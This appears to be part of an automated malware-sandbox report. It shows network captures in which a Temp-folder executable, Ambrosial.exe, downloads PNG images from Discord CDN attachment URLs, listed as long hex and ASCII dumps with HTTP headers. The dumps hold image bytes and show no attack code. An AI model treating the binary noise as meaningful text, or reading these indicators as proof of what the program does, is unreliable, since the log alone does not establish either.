                                                                                                                                                                                      2021-10-30 11:52:21 UTC784INData Raw: 49 de 1f 80 ce c8 fa 41 fb f0 bd 64 5c e0 4b bf f0 98 4b 87 e7 dc f2 a2 56 3d e8 94 a4 98 17 a5 64 53 c4 eb 9e fc e4 27 5f 3d fa d1 8f 3e e5 ee a0 9f a6 e5 fc fa 65 75 47 7e aa a6 2f bc 7b dd eb 5e 37 6f 0e 89 5f 30 f7 b9 2d 7c ac 84 98 d0 1a 1d ad ff 28 de cb cf c0 6d 74 c0 3f 13 ad 2b c5 e3 0f 78 c0 03 0e fd d9 b4 3f fd a7 ff f4 b5 76 2b fa 73 86 bb 3c fc e1 0f 3f fd 82 d8 3c 63 87 6b e0 39 7e 0d b9 c6 29 fa d0 1e a1 ea c3 5c 92 2f fd d2 2f bd f9 bf 7d 2f 81 fe 8d d0 bf f8 17 ff e2 49 cf eb c6 e7 d4 75 f7 ed 92 3d fc 7e 90 08 c6 55 bc 3e d7 8d e8 d9 53 3d 7f 5c 72 bf d9 a7 8b a3 23 ac c3 d7 35 13 07 9b eb ed 3a 76 87 e7 21 7c 79 f8 7d 94 f7 98 a4 8a 55 5f 3c a9 33 2a 37 ef 55 cf c5 76 7f 25 59 e7 6b c8 39 c8 71 c9 73 c8 9c 8c e3 13 e9 27 c6 fc 12 20 06
                                                                                                                                                                                      Data Ascii: IAd\KKV=dS'_=>euG~/{^7o_0-|(mt?+x?v+s<?<ck9~)\//}/Iu=~U>S=\r#5:v!|y}U_<3*7Uv%Yk9qs'
                                                                                                                                                                                      2021-10-30 11:52:21 UTC785INData Raw: 74 fc ca c5 ce fb 29 e7 11 ee ab d6 b2 e2 c3 4e 3f cc e2 e2 96 bb 9b 03 40 92 51 3c 63 c8 d3 9f fe f4 43 3f 4d d3 3f ab 33 43 17 fb e8 4f d5 ee 79 cf 7b de 3c 14 1f ab 9b c4 e3 95 50 83 54 3e 89 d6 bb 8b 6a 10 ef c3 88 30 a7 8f 9d 08 46 e1 ba 78 d8 c3 1e 76 e8 cf 13 ea 2f 8b 70 dd 2b f4 e1 10 7f fe cf ff f9 d3 b8 c3 43 1e f2 90 d3 ef 56 5b d9 9b df 7f 12 3e 98 ab 1f ce 19 aa f1 b3 d7 03 28 af 07 0f 40 e4 af fe d5 bf 7a fa df ee 7a 99 bd 04 0f 7e f0 83 af fe ee df fd bb 57 6f fb b6 6f 7b cb 3c fc 4d 47 89 d6 b4 0b eb 57 ad ef 09 5d e3 ee 99 d1 8b da 4e c8 e9 20 cf 49 9b 7b 8c eb ec f7 81 e3 b6 c7 d1 dd 27 dc c7 7d c4 3d 95 f1 4a c8 ad 62 2e 5d 2f ea 25 7c e1 74 32 9b a7 8a 0b 9f 43 22 3c 2e d0 d3 0f f8 bb 38 64 cc ed 51 cc f1 fb c1 ef 31 20 7e bb c4 e7 4c
                                                                                                                                                                                      Data Ascii: t)N?@Q<cC?M?3COy{<PT>j0Fxv/p+CV[>(@zz~Woo{<MGW]N I{'}=Jb.]/%|t2C"<.8dQ1 ~L
                                                                                                                                                                                      2021-10-30 11:52:21 UTC786INData Raw: 7b 5f c0 fd 83 a8 8f 8f c8 2e dc 17 39 0a ee 9b 14 5e a6 aa 11 dd 85 5e 8c 23 81 99 2d 72 3e 91 a3 f0 b8 f0 1c f7 8b b4 1d e6 82 aa de c9 dc 64 54 9b f8 35 e6 3a a7 6f e4 47 3a aa dc 5d d1 bd e8 f7 65 de 9b 48 15 c3 57 49 95 e3 9f e5 ca d6 e7 5a e2 3e f2 3c 1f bf c7 24 3e 5f 95 9b fd 5d 47 56 f6 26 21 bf 8a b9 d0 b3 ca 65 1e 8f e1 cb 75 60 23 d4 d0 1f f1 1e e4 60 a7 2e 51 0e a2 f3 70 7f 75 56 c4 3d d7 c5 ef cb 04 5f c6 aa 7c b7 33 26 a8 a9 62 33 6e f9 f5 1c de 28 85 4d 55 fe b4 f5 a0 d1 af 69 d8 45 ff e0 fa 4f ff f4 4f df 32 97 f7 77 bf c7 34 fa df 12 5d 45 eb fc d4 4f fd d4 f2 02 77 17 f5 88 b0 de 23 50 4b bd db ea 9d be 94 8e ea e1 cf ef 2b db 41 d7 eb 1f fe c3 7f 78 6d bd 1a fa ce d6 f7 8f ff f1 3f be fa d1 1f fd d1 53 ce 0e fa 8f 00 7e 5a a5 eb e4 2f
                                                                                                                                                                                      Data Ascii: {_.9^^#-r>dT5:oG:]eHWIZ><$>_]GV&!eu`#`.QpuV=_|3&b3n(MUiEOO2w4]EOw#PK+Axm?S~Z/
                                                                                                                                                                                      2021-10-30 11:52:21 UTC788INData Raw: fd b7 af 3b af f3 b1 1f fb b1 6d 6f 8d fe a1 cd 18 c2 b5 5a 85 6b ed e2 d7 9d 7e 8c 42 67 ec f8 d9 a7 70 6d 3e fd d3 3f fd ea 2f fc 85 bf 70 5d 71 d7 c1 fc d5 88 be 8b 6a 10 b7 d1 c1 75 cd b5 8a 9f 75 52 c5 66 f9 c4 75 6d 01 9f d7 7a 2e 78 5e c6 9c aa ce 7d 3e b7 f0 38 ba e7 a7 2d aa bc 24 e3 5e 83 e4 7d 5e e5 25 f2 51 d7 49 97 43 cf 51 6c 26 99 3b eb b3 12 e3 d9 e1 b9 12 9e 23 59 e3 3a 36 78 8e c7 67 a2 3c a7 cb 91 54 eb da 15 e6 73 5b 82 9d b1 4a 77 9f 44 eb f2 e7 30 3e e2 d8 08 cf f0 7c 76 e3 f3 e7 3c 36 be ea 3b 80 39 7c 5d 1a 01 dd 7d 15 b3 f8 8c 9d fa e1 d3 50 8d 52 46 fc d1 3f fa 47 af 7e d7 ef fa 5d d7 d6 1a ff e3 7f fc 8f 43 2f 77 a3 75 e9 d7 6e ec f2 01 1f f0 01 a7 df d3 c5 45 ec 2e 66 da e9 97 54 ec 7c f1 38 7c 41 8e 44 5f 70 ae 23 c2 bf fc 3c
                                                                                                                                                                                      Data Ascii: ;moZk~Bgpm>?/p]qjuuRfumz.x^}>8-$^}^%QICQl&;#Y:6xg<Ts[JwD0>|v<6;9|]}PRF?G~]C/wunE.fT|8|AD_p#<
                                                                                                                                                                                      2021-10-30 11:52:21 UTC789INData Raw: fa 0b 11 b9 df 99 70 46 3b 68 ad dd 1c ee af f4 ea 9a 78 bc 13 8f eb 3f 3e 3e f0 03 3f f0 f4 cb 82 6f 07 3e af 04 df 25 e1 0c 5c 2e 89 df 4f ae 03 f7 9c 4b 45 e7 17 ba c7 a1 eb e1 3e 72 aa 5c ec 2a 26 f0 f9 e7 6c 75 fe 2a e6 fe 99 40 15 93 38 3b b1 55 81 15 7f 9e 0f 2f 01 48 95 eb 3e 8f 8d 6c c4 e7 f7 7e ee c7 26 8e 08 cf f1 dc 8a 59 ee c8 cf b8 22 ec 21 6d c0 8f 2e d8 13 31 89 db a2 d2 ab 9a 95 3e 02 bf e8 c6 c4 9f 63 95 7e ce 73 6e b5 b6 5b db 8c f6 09 a9 89 57 e4 77 fe ce df 79 f8 a7 69 7a 59 83 aa 77 27 7a b0 57 7e 89 3f fc 8f fe 54 ed 4f fd a9 3f 75 a7 9e 6e e3 43 64 eb 4b 58 3f dd 22 e6 39 d2 05 e3 0e aa 41 e8 97 c2 8b 99 bf 08 48 b2 56 23 3c fb d9 cf be d6 d6 d1 df cc d4 ef 3d e3 03 e5 c2 7f dd f0 40 14 1a 53 2a 7c 9d ff e5 bf fc 97 d3 4f 8e 76 d1
                                                                                                                                                                                      Data Ascii: pF;hx?>>?o>%\.OKE>r\*&lu*@8;U/H>l~&Y"!m.1>c~sn[WwyizYw'zW~?TO?unCdKX?"9AHV#<=@S*|Ov
                                                                                                                                                                                      2021-10-30 11:52:21 UTC790INData Raw: ff b2 4b 1d 01 d7 85 e7 64 de 6a 2c f1 98 bf 70 78 cc 75 6c e0 45 c6 65 f4 02 b7 22 f4 99 f9 1d f7 a1 cf 84 5e 8e 7c d5 fa 21 75 b7 05 be 4a 56 a9 6a dc d7 c5 c0 73 52 76 e8 f2 75 46 23 56 e7 d1 67 85 cf 1a 9f bb 4e f2 3b 16 91 8f 1f a4 b8 cf c5 5f e8 24 de 17 3b fd ac c9 c7 a4 f3 5f 9a f2 89 c2 42 47 8b 38 f2 d3 34 fd 33 51 fa 49 89 f7 97 70 78 c2 fd 6e bb 4e be 84 c3 e7 62 70 41 d0 25 8a 7f f1 17 7f f1 a9 c7 0e fa f7 2f 1f f5 a8 47 dd 69 4e 89 60 3d 9a 0f dd 45 79 e8 47 18 dd ec 19 f3 39 72 4e e5 4a f4 67 d3 8e fe 34 8d 1e a2 fb 90 76 e7 e3 eb 49 9d b1 12 fd be b6 5f fc c5 5f 3c e5 ac f2 66 6f f6 66 a7 bf 58 40 0f e1 3d 5d b4 ce 3c c7 5d bc 1f a4 2d 2a 9f 93 71 6c 7c 9d 2e 5c d7 ff e6 ff 98 8f f9 98 ab 9f fe e9 9f be f6 ec 51 cd e3 3e e1 fa 0e dc 17 3b
                                                                                                                                                                                      Data Ascii: Kdj,pxulEe"^|!uJVjsRvuF#VgN;_$;_BG843QIpxnNbpA%/GiN`=EyG9rNJg4vI__<fofX@=]<]-*ql|.\Q>;
                                                                                                                                                                                      2021-10-30 11:52:21 UTC792INData Raw: 82 3a 04 b2 be d2 47 be 91 40 da 15 5e 57 09 54 31 49 ee 0f a9 6a a0 b3 11 ef 21 f0 39 e4 02 b6 0b a0 57 3e 91 f9 ab 54 9f 35 ff ac 22 f8 f5 d9 c3 57 e9 e4 a1 3b 95 ef ae 84 33 72 b9 e5 5b 8a 85 bb 38 6f ff f6 6f 7f fa 8d e8 bb e8 cf b3 e9 a5 41 f8 41 89 9c 8f b8 1f 2e 79 4e 65 7b 4d 0a bc fc e5 2f bf fa f6 6f ff f6 6b 6b 1d fd 54 2d 0f 8f 9b 5c a2 fd 49 f4 d3 2c 6c 8f e3 db 81 39 e8 5b fd f4 0c e9 62 ea a1 7f 1f 72 17 fd 6f ea 7f ff ef ff fd b5 75 eb 0b 8d 9f a7 9f 6f a7 27 99 57 8d c2 e7 fc aa af fa aa 6b 6d 9d a7 3c e5 29 57 6f f5 56 6f 75 6d dd fa c0 00 9d ef 51 72 1f be 76 d7 45 c6 1d 62 1e 77 5b e7 50 7d 1e dc 86 ce a7 df 5b a8 7f 71 43 bf b4 78 07 fa 65 cf 1d bc f6 48 af db 95 cf 5a 90 8a 51 9c e7 80 c3 b5 ea a8 6a ba b9 ab dc 0a f2 56 f3 13 af d9
                                                                                                                                                                                      Data Ascii: :G@^WT1Ij!9W>T5"W;3r[8ooAA.yNe{M/okkT-\I,l9[brouo'Wkm<)WoVoumQrvEbw[P}[qCxeHZQjV
                                                                                                                                                                                      2021-10-30 11:52:21 UTC793INData Raw: 58 b2 f4 23 b2 cf f9 9c cf b9 d6 d6 79 c9 4b 5e 72 fa 5b 66 5a 4c 6e be 7a 68 12 cb 43 73 71 9f 5f 24 cf c1 2f bd bb 18 12 e5 7c c9 97 7c c9 f6 4f d5 ee 77 bf fb 5d 7d d0 07 7d 50 b9 be 14 e6 f1 35 ed 42 1f e6 ab 74 6c 7c 9a 4b ff 9b fa 9e f7 bc e7 75 97 75 f4 e7 f7 c4 39 5f 26 bb 68 cd 80 ee 3e ed 0b f4 17 41 fe e3 7f fc 8f d7 d6 3a fa a9 1a 54 f3 ed 50 d5 cc 7c a3 79 32 e6 fb 15 19 97 8d 74 78 8e 4b 15 fb 8e ef f8 8e d3 3f bd 55 c5 2a 39 42 57 5b f9 8f ce d1 dd b3 95 bf 9a 73 65 5e f5 4a 49 f2 fa 89 2e 97 79 77 c5 6b 3b 3c bf 12 87 e7 07 02 d2 fd 19 56 f5 d9 15 9f c7 ed cc 1b 49 95 3f eb e3 54 31 8d 3c a7 25 90 b9 12 72 76 25 fb 38 19 43 46 78 3c 73 bd 07 52 51 e5 a5 40 15 73 f1 bd ae e4 23 9c 8d 8f 29 7e 1f ba 5d c5 f9 73 da d2 79 51 53 8e f4 ea 9d a1
                                                                                                                                                                                      Data Ascii: X#yK^r[fZLnzhCsq_$/||Ow]}}P5Btl|Kuu9_&h>A:TP|y2txK?U*9BW[se^JI.ywk;<VI?T1<%rv%8CFx<sRQ@s#)~]syQS
                                                                                                                                                                                      2021-10-30 11:52:21 UTC794INData Raw: b4 8e aa f6 9c f5 cc 72 47 2f 0c 62 77 2f ab f9 bb 7d a1 aa c3 97 63 22 ff e8 3e a8 e8 7a 1d 21 cf 3a 7b 8f d6 0d 55 0e be 2a 4f a3 bf 08 31 ba de 8d e8 d5 0b 97 48 5f 95 27 c9 5c e1 6b 72 7f 8e 62 14 4b 46 31 31 8b c3 91 bc f6 45 2d 19 dd 84 ab 13 27 ab 75 cc ed 6b 90 9e fe 8c 9f 4b d7 2f 7b af e4 a1 77 71 b1 f2 65 3a aa 9f d9 d0 f9 45 c6 f2 8b d5 e3 2b 3a a4 6f 96 2f d2 7f 64 2d 70 89 dc d1 fc c9 ac 6f c7 ac ae eb 31 aa 9b ad 7b d6 d3 e3 9d 2e 66 b6 18 dd e3 15 b3 9c 23 3d 78 ee ac d4 de d5 1c 7d 96 76 ac f4 f3 9c 95 fc 7c 29 48 76 f7 70 ce 9e 67 b5 47 7b 53 a7 31 7b 1c ed 39 63 76 ae 7c 76 32 6f b4 be 6a ad ab f9 d2 dd ce 17 20 74 c6 ce 2f bc 96 b1 12 62 ca af fc 95 dd f5 46 87 4a af f2 9c ce ef ac e4 88 73 f2 ee 78 56 dd 68 ab 2f f1 20 3b 77 a3 be 06
                                                                                                                                                                                      Data Ascii: rG/bw/}c">z!:{U*O1H_'\krbKF11E-'ukK/{wqe:E+:o/d-po1{.f#=x}v|)HvpgG{S1{9cv|v2oj t/bFJsxVh/ ;w
                                                                                                                                                                                      2021-10-30 11:52:21 UTC796INData Raw: eb c5 4e 0f ff e2 16 3b b5 70 a4 a6 e3 68 af 73 d6 30 aa dd 89 b9 ed 2f 54 8c 9d 28 57 82 4d 3e 3e ef e5 82 6f 34 52 2b f0 89 4e 17 ab 31 58 c9 11 9d df 59 c9 71 76 f2 67 b9 2b f1 3b 9e 4b 77 7e 51 3b fa 00 1d d5 ed 1e 44 f6 72 7b 14 13 d5 3a 56 fa 55 3e 91 b5 a2 f2 41 c6 66 f6 ca 97 7b 35 9f fb 56 74 31 b2 73 1d 3b 7d 44 97 33 ab ad 7a 89 d1 7a a0 ab 75 8e ce bf 92 57 f9 56 5e 82 60 a5 a7 db 2b ba 48 bb 62 e5 be 83 ca bf 32 07 cc 72 77 7a 75 a8 c7 ee 73 66 95 db d5 fb dc 9e e7 d4 77 b5 a3 9e ab f3 f9 17 35 ac d6 5e 3a ef 08 b3 de 97 9e db fb 65 ef d9 5c d5 4b 91 8f 95 8c fe c1 72 89 f4 aa 1e 5f 8e dd 8b 99 70 7b 14 13 a3 5c b1 ea 13 9d 1f 66 f1 8a 9d 9a 73 e6 cf d8 1d cf 9f 5b 5f d4 ce 79 60 ee d4 56 8b ac ea dd d7 f5 4f ff cc 16 f8 3c 36 f2 25 9d 5f 64
                                                                                                                                                                                      Data Ascii: N;phs0/T(WM>>o4R+N1XYqvg+;Kw~Q;Dr{:VU>Af{5Vt1s;}D3zzuWV^`+Hb2rwzusfw5^:e\Kr_p{\fs[_y`VO<6%_d
                                                                                                                                                                                      2021-10-30 11:52:21 UTC797INData Raw: d4 a5 c3 bc 03 2e 79 14 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                      Data Ascii: .yIENDB`


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      11192.168.2.349773162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:26 UTC797OUTGET /attachments/489891892142669842/835660013732626522/ataniclassic.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      2021-10-30 11:52:26 UTC797INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:26 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 45109
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a646ffd1f543237-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 2409304
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "e5ef6bdf0c495893af82822f51711550"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:26 GMT
                                                                                                                                                                                      Last-Modified: Sat, 24 Apr 2021 23:34:33 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1619307273119472
                                                                                                                                                                                      x-goog-hash: crc32c=MG/HgQ==
                                                                                                                                                                                      x-goog-hash: md5=5e9r3wxJWJOvgoIvUXEVUA==
                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 45109
                                                                                                                                                                                      X-GUploader-UploadID: ADPycdspesRjh5dI-f9WhmgiYKMGlO744ai1a-fyvrp_KrHF--_bC5e7xDQ0-naM-GyKFrh8SriXSZ-RVxpBkrwuRzUuQYTAkQ
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PuVGCSbBxZ8ESrZOMSGVLqIWX1LqjPxlZjhVokksE1UsNApmi3ED%2B3wfKzYIRrC%2BNI9UFmIHGb5aZBrAgxCPus6nsllTKwMdAMKrv1OIBHCPWsmyvIyTzUJzGjE0mkk3HFnZBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:26 UTC799INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:26 UTC799INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 af ca 49 44 41 54 78 5e ed bd 09 d4 ae 6d 59 d6 ff 6e 54 2c 67 45 06 29 07 d0 90 40 44 c0 09 45 90 4c 66 02 57 8a 13 8a e5 14 69 0e 24 0e e5 10 21 59 6a a9 e4 90 9a 26 ab a5 39 24 39 64 a9 59 16 ad 5c a6 59 da 80 a5 14 d5 aa 1c 28 b5 24 9c 32 ff df f1 f0 fe 36 c7 3e be f3 bc 86 fb 79 f6 47 fd f3 b7 d6 b9 ae 73 be 86 fb 7e ee e7 fe de 6f ef 77 df 78 fc e3 1f ff 5b 37 6e dc b8 12 8c 42 7a fa 19 ef 76 b7 bb 9d 46 91 79 99 db 8d d9 c3 47 d1 d5 75 a3 a0 a7 fb 46 f9 2b 79 d5 3a a1 aa f1 9c 8c 0b f4 d1 fe 47 75
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYs(JIDATx^mYnT,gE)@DELfWi$!Yj&9$9dY\Y($26>yGs~owx[7nBzvFyGuF+y:Gu
                                                                                                                                                                                      2021-10-30 11:52:26 UTC800INData Raw: ae 6b 74 9d 17 18 50 0f d6 94 6b 63 4e ff 5f a1 42 ba 7a e1 93 5e 8d c2 cf 45 b8 2e aa 9a f4 69 44 f7 fd 49 7c 8f ee f3 1c f4 24 f7 e4 a4 5d 91 3d 47 76 35 bf 33 8a 67 1f 6c 3f 5b f7 77 a3 70 1d ba bc cc cd bc 1c 05 fa 8d 27 3d e9 49 c3 17 35 c1 0d 96 79 d5 58 e9 62 d6 43 ac f8 18 77 fa 89 95 3c 7a 0a cf ab 72 dd 27 2a bf eb 5d ef 6a 14 55 ac f2 f9 28 2a dd 7d a2 f2 57 eb 03 b7 67 fa 4a 6e 37 57 a7 8b ce ee 46 f0 b9 84 c7 77 74 f7 39 3b fe d1 5a 44 37 57 37 87 18 c5 c4 d1 f8 ac 2e f7 92 a8 de 1f 38 33 ba f9 d4 63 b6 96 0a e6 5e f9 92 49 1b 7c de 95 35 64 7f 8d 95 2f 61 8d 3b 54 fd aa de 2b 54 fb 64 d4 75 4e 9f e7 8b b4 13 5f 2b a2 3d f3 c5 c8 28 f1 ff bd 88 38 9a cb 45 eb cb 35 ba be c2 2c 4f 6b e0 1a b1 d6 ea 27 4c 82 f9 59 53 8e e8 9e 0b d2 e9 e5 3d a5
                                                                                                                                                                                      Data Ascii: ktPkcN_Bz^E.iDI|$]=Gv53gl?[wp'=I5yXbCw<zr'*]jU(*}WgJn7WFwt9;ZD7W7.83c^I|5d/a;T+TduN_+=(8E5,Ok'LYS=
                                                                                                                                                                                      2021-10-30 11:52:26 UTC801INData Raw: e8 e7 5b e1 bd 1c 3e 53 5e 2b dd 05 d0 dd d7 91 eb d5 98 3e 91 be 6e af ee 73 bf a8 f2 84 eb b9 ef 64 f4 6c 49 ba fd e7 ba c4 6c 5e 47 f5 d9 c3 7d 3e 22 f4 cf 58 a5 3b 69 af 42 9d ce a0 eb 2d e4 bb f1 f4 a7 3f fd 66 24 0f 2d 6f 26 8d 95 4f e4 4d ca 28 52 cf 9c 1c 57 7a ed c4 76 fa 89 99 ee be ae 77 95 bb 12 13 5d 9e c6 f4 89 4a f7 0f 4b 15 9f d5 43 95 0f e9 cb b3 10 55 fd c8 27 5c 17 69 5f 62 6f 2b ba f0 b9 20 73 44 fa aa 1c 58 a9 17 b3 9e a3 39 3a aa fd 88 59 af 2e 2e ff e9 41 72 3d 26 d4 55 b1 11 b3 f5 ec d0 3d fc 1c b7 bb 2f 04 cf 19 e9 d8 a9 e7 17 27 ba 70 5d b0 7f 1f 25 fa df 69 6e 57 ba 8f 97 44 3d 7d fd e0 7b 71 5d a4 5e 7d 19 fa 98 54 fb e8 72 d3 2f db a5 9b 5b e4 b9 55 cf 32 f0 3a c7 73 b3 5f 8e d0 f9 7d 8e 6a bd a3 38 63 de 6f d0 e5 43 e6 6a 6d
                                                                                                                                                                                      Data Ascii: [>S^+>nsdlIl^G}>"X;iB-?f$-o&OM(RWzvw]JKCU'\i_bo+ sDX9:Y..Ar=&U=/'p]%inWD=}{q]^}Tr/[U2:s_}j8coCjm
                                                                                                                                                                                      2021-10-30 11:52:26 UTC803INData Raw: 51 f5 80 d9 5c a2 ea 59 31 9a 67 b4 e6 11 b3 f5 8d e6 ac d0 03 47 35 2b 0f bc 51 ef 8c cd d6 31 8a ef 3e 7c c1 eb 6e 3e 48 6d 6f d9 77 66 ef ec 57 b8 0f bd eb e1 73 55 eb ab 7c fa b2 70 5b cc 6c 70 7f 97 03 2b 3d dd 57 7d 31 57 8c fa 8e 62 33 c8 d5 59 8f ea ba 6b d1 b1 9a 5f cd 39 db 0f 76 77 76 a3 9e a3 98 40 f7 f5 57 f1 4b 50 f5 62 4f c4 72 ee f4 77 63 d2 bd 2c 1d c1 cf 26 9f c5 dd b9 89 bc 5e d3 17 35 21 3d fd f9 c5 3c 1b 45 ea d8 b3 5e a2 8b 55 b9 7e 20 ab 75 8c c2 75 c0 97 6b 15 d9 63 14 13 a3 f8 6a 9e 18 c5 bb 9b c2 6b 44 da 62 25 37 73 aa 33 17 33 3d 47 98 d9 a2 db 23 b8 5d e9 39 0a d7 a1 f2 39 a3 fb cd 39 3a 4f fa bb 3c f0 78 9e d1 0a 3b f3 8d 62 3c 7c 94 b3 fb b0 9b ad 61 34 2f ac e4 24 a7 87 e2 75 dd ca 9a 3d a7 db ef 4a 9f 9d b5 1e dd 97 8f 22
                                                                                                                                                                                      Data Ascii: Q\Y1gG5+Q1>|n>HmowfWsU|p[lp+=W}1Wb3Yk_9vwv@WKPbOrwc,&^5!=<E^U~ uukcjkDb%7s33=G#]999:O<x;b<|a4/$u=J"
                                                                                                                                                                                      2021-10-30 11:52:26 UTC804INData Raw: aa 57 d7 b7 ba 4e 90 b6 18 f5 14 f8 aa 98 18 c5 f3 4c 12 af c9 fa d9 7c 15 ab b1 23 bd 2b 46 67 9d dc d5 6b 7b 6d f2 da 5e 6b 7e 09 a4 0d f8 bb 78 c5 2c d7 e3 dd 8b c6 ec 73 01 55 fd ca 9a bb 58 e5 1f f5 11 8a fb f5 4c 1b 3d 47 e1 ba f0 b9 d0 35 ba ee e3 b9 64 9f 95 17 0a d6 bc b3 86 cc cd 9e 89 c7 35 5f 97 b7 43 ee cd fb e6 75 18 e1 6b 41 cf 51 48 1f e5 b2 9e f4 43 da db 3f 51 13 ae e7 c3 b8 cb f3 d8 28 07 e8 eb 75 22 f5 2a 96 a3 f0 7e 4e 55 0f de a7 cb cb 9a ee cb 09 7d 36 8a 4a 9f e5 89 51 4e 57 37 5b af 93 be 2e 1f bd f2 75 f3 89 2a bf a2 ab db e9 57 dd 0f 99 23 46 3d c5 ac 66 a5 a7 9f 09 54 75 b0 d2 d3 59 cd 4f df ee 3c ce a5 f7 b4 3a 2f ec e6 1f 81 39 f2 a1 5a 31 5b 4f c6 bb 9e 5d 9f 9d b5 54 74 75 95 7f 77 8e cc 9f d5 cf ce ca a1 97 f7 ac fa 77 2f
                                                                                                                                                                                      Data Ascii: WNL|#+Fgk{m^k~x,sUXL=G5d5_CukAQHC?Q(u"*~NU}6JQNW7[.u*W#F=fTuYO<:/9Z1[O]Ttuww/
                                                                                                                                                                                      2021-10-30 11:52:26 UTC805INData Raw: b3 4c 66 b5 62 65 0d ce ac e7 ee 9c 2b f9 a2 ca 3b ba f7 51 6c f6 a5 d1 d1 f5 ec 6a 57 f7 9d 64 bf fc 42 04 d9 47 e7 80 95 7d c3 4e ee 08 ef b3 a2 8f f0 bc ee 85 08 b2 67 35 c7 ca 1a 66 75 d0 d5 0b 62 a3 35 8f ea c5 2c 0e 5d 9e fb ab 9c 9d 3a bf 47 b3 0e bb aa 83 1b 4f 7f fa d3 4f 1e 6e e8 1c a1 b3 d3 2f f0 e5 43 c4 73 3b 5d 60 af e6 0b 7c d5 17 a0 c6 ac e9 6c f7 77 ba e6 c8 fc dd 91 75 ae e6 6b 44 17 5d 9e e8 62 3e a2 77 d7 88 51 b8 2e 56 62 39 e6 7e 45 57 2b 2a 3d f3 a1 ab 13 d5 bc 62 66 8b ae ef 91 5e 7e ce 47 ea c5 d1 3a 51 c5 d2 57 ad d1 73 32 7f a5 27 ac f8 bb 9c bc 47 45 97 eb ec ae 25 a9 f2 46 b5 47 63 22 e3 d5 9e 47 64 fd 91 b5 e4 97 43 52 c5 67 fb 12 aa 53 1e e3 88 d9 1a 2a b2 26 bf dc ab b3 9c bd b4 8c d8 5d e3 b9 7b 42 ef fa ec fa 45 17 5b 79
                                                                                                                                                                                      Data Ascii: Lfbe+;QljWdBG}Ng5fub5,]:GOOn/Cs;]`|lwukD]b>wQ.Vb9~EW+*=bf^~G:QWs2'GE%FGc"GdCRgS*&]{BE[y
                                                                                                                                                                                      2021-10-30 11:52:26 UTC807INData Raw: 56 b3 75 75 f1 51 dd ce 5e ab dc 9d 7a e1 f9 5d ad 9f 41 e6 ac be e0 54 bd bb f9 04 b1 2e 67 54 eb 74 79 a3 75 27 d5 5a 56 e7 87 ae 76 d4 a7 8a 69 dd 37 9e f4 a4 27 dd e9 df fa f4 8b 54 7d 01 55 79 20 9f fb 33 a7 b3 99 07 7b d6 23 f3 aa fc 6a ed 42 fa a8 ae 1b 45 ae 53 cc ea ba 51 bd 56 73 bb 51 ac e6 32 8a ca 27 56 f6 07 55 8e 58 d1 fd da 08 8f 09 ec 6e 04 b7 2b bd bb 07 a0 aa e9 46 e1 3a a4 6f 34 e7 ac e7 4e fe ec 0c 9d aa 5e a0 af d6 42 fa 46 f5 b9 4e 31 ca 87 a3 39 ab be 73 19 f5 ec 62 2b eb a8 ce eb 12 dc 8e 33 48 76 bf cc 58 53 57 37 7a c1 da 9d eb 1c 56 e7 ea f2 76 d7 5a e5 cf 7a 54 71 9d 6f fa 57 d7 32 7b b9 15 f4 f2 9e 9d 5e 91 f1 2a 7f a7 1f 54 6b df 59 cb ca 9c ab 6b 21 6f 94 5f c5 7c 0f 37 9e f8 c4 27 de f2 a2 96 1f 66 ec ee cb a7 cb cf 11 46
                                                                                                                                                                                      Data Ascii: VuuQ^z]AT.gTtyu'ZVvi7'T}Uy 3{#jBESQVsQ2'VUXn+F:o4N^BFN19sb+3HvXSW7zVvZzTqoW2{^*TkYk!o_|7'fF
